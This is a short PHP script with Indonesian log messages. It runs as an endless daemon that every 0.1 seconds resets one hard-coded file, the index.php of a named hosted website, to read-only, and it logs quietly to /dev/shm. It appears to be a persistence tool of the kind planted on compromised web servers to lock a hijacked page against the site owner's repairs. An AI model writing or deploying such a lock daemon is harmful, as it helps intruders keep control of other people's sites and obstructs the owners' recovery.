<?php
set_time_limit(0);
error_reporting(E_ALL);
ini_set('display_errors', 0);

$targetFile = '/home/u1599488/public_html/soasik.bpsaceh.com/public/index.php';
$logFile    = '/dev/shm/shm.log';
$Microsec   = 100000;

function writeLog($msg) {
    global $logFile;
    $time = date('Y-m-d H:i:s');
    $line = "[$time] $msg\n";
    $fp = @fopen($logFile, 'a');
    if ($fp) {
        @flock($fp, LOCK_EX);
        @fwrite($fp, $line);
        @flock($fp, LOCK_UN);
        @fclose($fp);
    }
}

function currentProcessUid() {
    return function_exists('posix_geteuid') ? posix_geteuid() : null;
}

function octalPerms($permsInt) {
    return sprintf('%04o', $permsInt & 0777);
}

function chmodFile($path) {
    $procUid = currentProcessUid();

    if (!is_file($path)) {
        writeLog("Target bukan file: $path");
        return;
    }

    $perms = @fileperms($path);
    if ($perms === false) {
        writeLog("Tidak bisa baca perms file: $path");
        return;
    }
    $perms = $perms & 0777;

    $ownerUid = @fileowner($path);
    if ($procUid !== null && $ownerUid !== false && $procUid !== $ownerUid) {
        writeLog("Skip chmod file (owner mismatch): $path owner=" . ($ownerUid) . " proc=" . $procUid);
        return;
    }

    if ($perms !== 0444) {
        $ok = @chmod($path, 0444);
        if ($ok) {
            writeLog("Sukses chmod file 0444: $path (sebelum " . octalPerms($perms) . ")");
        } else {
            writeLog("Gagal chmod file: $path (sebelum " . octalPerms($perms) . ")");
        }
    }
}

writeLog("===== START daemon (target file: $targetFile) =====");
while (true) {
    chmodFile($targetFile);
    usleep($Microsec);
}
